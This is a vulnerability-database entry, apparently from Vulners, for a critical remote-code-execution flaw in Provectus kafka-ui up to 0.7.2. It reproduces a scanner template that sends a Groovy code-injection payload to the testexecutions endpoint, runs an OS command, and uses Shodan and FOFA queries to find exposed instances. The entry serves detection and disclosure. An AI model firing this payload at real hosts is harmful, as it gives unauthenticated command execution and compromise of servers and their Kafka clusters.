Provectus kafka-ui <=0.7.2 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2026-5562 | 5 Apr 202611:00 | – | attackerkb | |
| CVE-2026-5562 | 5 Apr 202612:56 | – | circl | |
| kafka-ui 代码注入漏洞 | 5 Apr 202600:00 | – | cnnvd | |
| CVE-2026-5562 | 5 Apr 202611:00 | – | cve | |
| CVE-2026-5562 provectus kafka-ui Endpoint testexecutions validateAccess code injection | 5 Apr 202611:00 | – | cvelist | |
| EUVD-2026-19071 | 5 Apr 202612:30 | – | euvd | |
| CVE-2026-5562-Exploit | 8 Sep 202612:58 | – | kitploit | |
| CVE-2026-5562 | 5 Apr 202611:16 | – | nvd | |
| PT-2026-30432 | 5 Apr 202600:00 | – | ptsecurity | |
| CVE-2026-5562 | 7 Apr 202610:52 | – | redhatcve |
10
| Source | Link |
|---|---|
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2026-5562 |
| vuldb | www.vuldb.com/ |
| github | www.github.com/provectus/kafka-ui |
id: CVE-2026-5562
info:
name: Provectus kafka-ui <=0.7.2 - Remote Code Execution
author: christianfl,0xNayel
severity: critical
description: |
Provectus kafka-ui versions 0.7.0 through 0.7.2 are vulnerable to code injection in the `/api/smartfilters/testexecutions` endpoint. The `filterCode` parameter is evaluated as a Groovy expression without sandboxing, allowing an unauthenticated attacker to execute arbitrary code and operating-system commands on the host.
impact: |
Successful exploitation grants unauthenticated remote code execution in the context of the kafka-ui process, leading to full compromise of the host and the connected Kafka clusters.
remediation: |
Provectus kafka-ui is end-of-life and no patched release exists (0.7.2 is the final version). Migrate to the maintained kafbat/kafka-ui fork, and in the meantime restrict network access to the interface and place it behind authentication.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-5562
- https://vuldb.com/?id.355332
- https://github.com/provectus/kafka-ui
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-5562
cwe-id: CWE-94
metadata:
verified: true
max-request: 1
vendor: provectus
product: kafka-ui
shodan-query: http.title:"UI for Apache Kafka"
fofa-query: title="UI for Apache Kafka"
tags: cve,cve2026,rce,kafka-ui,provectus,groovy,injection,intrusive
variables:
cmd: "id"
marker: "{{rand_base(6)}}"
http:
- raw:
- |
PUT /api/smartfilters/testexecutions HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/json
{
"filterCode": "throw new Exception('{{marker}}_' + '{{cmd}}'.execute().text)",
"key": "k",
"value": "v",
"offset": 0,
"partition": 0,
"timestampMs": 0
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{marker}}_"
- type: regex
part: body
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "{{marker}}_(uid=[0-9]+\\([a-z0-9_-]+\\)[^\"\\\\]*)"
# digest: 4a0a0047304502202274dae6ced61f2e7306ef639bc83fb2425ff944504ffba159af7181c61946a0022100c9c703beaf876637ecabe2be85d37c875ccc907e9300a46897b59578613b3109:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Sep 2026 15:35Current
CVSS 3.17.3 - 9.8
CVSS 46.9
CVSS 27.5
CVSS 37.3
EPSS0.0062
SSVC